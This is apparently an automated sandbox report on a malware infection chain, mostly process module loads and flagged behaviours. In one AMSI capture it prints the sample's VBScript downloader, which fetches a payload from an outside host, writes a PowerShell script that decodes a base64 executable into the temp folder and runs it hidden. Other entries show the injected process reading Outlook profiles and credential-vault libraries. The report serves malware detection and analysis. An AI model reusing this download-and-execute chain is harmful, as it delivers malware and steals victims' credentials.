Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\sxstrace.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source:	Binary string: sxstrace.pdb source: svchost.exe, 00000006.00000003.1767543881.000000000342B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1767496215.000000000341A000.00000004.00000020.00020000.00000000.sdmp, qVTSNa7tUPbuzPK.exe, 00000008.00000002.2690309856.00000000007DE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: sxstrace.pdbGCTL source: svchost.exe, 00000006.00000003.1767543881.000000000342B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1767496215.000000000341A000.00000004.00000020.00020000.00000000.sdmp, qVTSNa7tUPbuzPK.exe, 00000008.00000002.2690309856.00000000007DE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: x.exe, 00000005.00000003.1485789551.0000000003610000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000005.00000003.1475837691.0000000003420000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1702237590.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1704213775.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1801692455.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1801692455.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, sxstrace.exe, 00000009.00000003.1804401295.000000000491E000.00000004.00000020.00020000.00000000.sdmp, sxstrace.exe, 00000009.00000002.2695172752.0000000004C6E000.00000040.00001000.00020000.00000000.sdmp, sxstrace.exe, 00000009.00000002.2695172752.0000000004AD0000.00000040.00001000.00020000.00000000.sdmp, sxstrace.exe, 00000009.00000003.1801652812.000000000476C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: x.exe, 00000005.00000003.1485789551.0000000003610000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000005.00000003.1475837691.0000000003420000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000006.00000003.1702237590.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1704213775.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1801692455.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1801692455.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, sxstrace.exe, 00000009.00000003.1804401295.000000000491E000.00000004.00000020.00020000.00000000.sdmp, sxstrace.exe, 00000009.00000002.2695172752.0000000004C6E000.00000040.00001000.00020000.00000000.sdmp, sxstrace.exe, 00000009.00000002.2695172752.0000000004AD0000.00000040.00001000.00020000.00000000.sdmp, sxstrace.exe, 00000009.00000003.1801652812.000000000476C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: sxstrace.exe, 00000009.00000002.2696147303.00000000050FC000.00000004.10000000.00040000.00000000.sdmp, sxstrace.exe, 00000009.00000002.2690176062.0000000002E04000.00000004.00000020.00020000.00000000.sdmp, qVTSNa7tUPbuzPK.exe, 0000000C.00000000.1876966284.0000000002DDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.2100834106.000000001CEAC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: sxstrace.exe, 00000009.00000002.2696147303.00000000050FC000.00000004.10000000.00040000.00000000.sdmp, sxstrace.exe, 00000009.00000002.2690176062.0000000002E04000.00000004.00000020.00020000.00000000.sdmp, qVTSNa7tUPbuzPK.exe, 0000000C.00000000.1876966284.0000000002DDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.2100834106.000000001CEAC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qVTSNa7tUPbuzPK.exe, 00000008.00000000.1721160648.0000000000D9F000.00000002.00000001.01000000.0000000A.sdmp, qVTSNa7tUPbuzPK.exe, 0000000C.00000000.1876514264.0000000000D9F000.00000002.00000001.01000000.0000000A.sdmp

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: CreateTextFile("C:\Temp\script.ps1", "true");IServerXMLHTTPRequest2.responseText();ITextStream.Write("$p=[IO.Path]::Combine($env:TEMP,"x.exe")[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdC");ITextStream.Close();IFileSystem3.FolderExists("C:\Temp");IFileSystem3.CreateFolder("C:\Temp");IServerXMLHTTPRequest2.open("GET", "https://www.atc-secure.com/exl04d3r", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.status();IFileSystem3.CreateTextFile("C:\Temp\script.ps1", "true");IServerXMLHTTPRequest2.responseText();ITextStream.Write("$p=[IO.Path]::Combine($env:TEMP,"x.exe")[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdC");ITextStream.Close();IWshShell3.Run("PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\script.", "0", "true")

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAA2HK3Pcn3DnH

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 5_2_00E24B37 LoadLibraryA,GetProcAddress,

5_2_00E24B37

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E48945 push ecx; ret	5_2_00E48958
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0040886A push edi; ret	6_2_00408871
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00405256 push FFFFFF8Bh; iretd	6_2_004052C4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00416A73 push ecx; retf	6_2_00416A9A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_004042E9 push edi; iretd	6_2_004042EA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_004052BB push FFFFFF8Bh; iretd	6_2_004052C4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_004033F0 push eax; ret	6_2_004033F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0040EBA5 pushad ; iretd	6_2_0040EBA8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0040AC72 pushad ; iretd	6_2_0040AC78
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0040AC0F push ss; iretd	6_2_0040AC1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0040D4A1 push 346DFDCFh; iretd	6_2_0040D4A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0040D500 push eax; iretd	6_2_0040D501
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00417D33 push edi; ret	6_2_00417D3C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00417D32 push edi; ret	6_2_00417D3C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0040D580 push esi; retf	6_2_0040D581
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00413DB3 push esi; iretd	6_2_00413DBA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00416623 push ebp; ret	6_2_004166A9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00417725 push edx; iretd	6_2_00417741
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B309AD push ecx; mov dword ptr [esp], ecx	6_2_03B309B6
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	Code function: 8_2_03302330 push edi; ret	8_2_03302337
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	Code function: 8_2_033023F8 push edi; retf 0001h	8_2_033023FF
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	Code function: 8_2_033111EB push edx; iretd	8_2_03311207
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	Code function: 8_2_03307046 push esi; retf	8_2_03307047
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	Code function: 8_2_033100DF push ebp; ret	8_2_0331016F
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	Code function: 8_2_03304738 pushad ; iretd	8_2_0330473E
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	Code function: 8_2_0330FF02 push esi; retf	8_2_0330FF03
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	Code function: 8_2_03306F67 push 346DFDCFh; iretd	8_2_03306F6C
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	Code function: 8_2_033117F9 push edi; ret	8_2_03311802
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	Code function: 8_2_033117F8 push edi; ret	8_2_03311802
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	Code function: 8_2_03306FC6 push eax; iretd	8_2_03306FC7
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe	Code function: 8_2_0330866B pushad ; iretd	8_2_0330866E

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\x.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E248D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		5_2_00E248D7
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00EA5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		5_2_00EA5376

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 5_2_00E43187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

5_2_00E43187

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
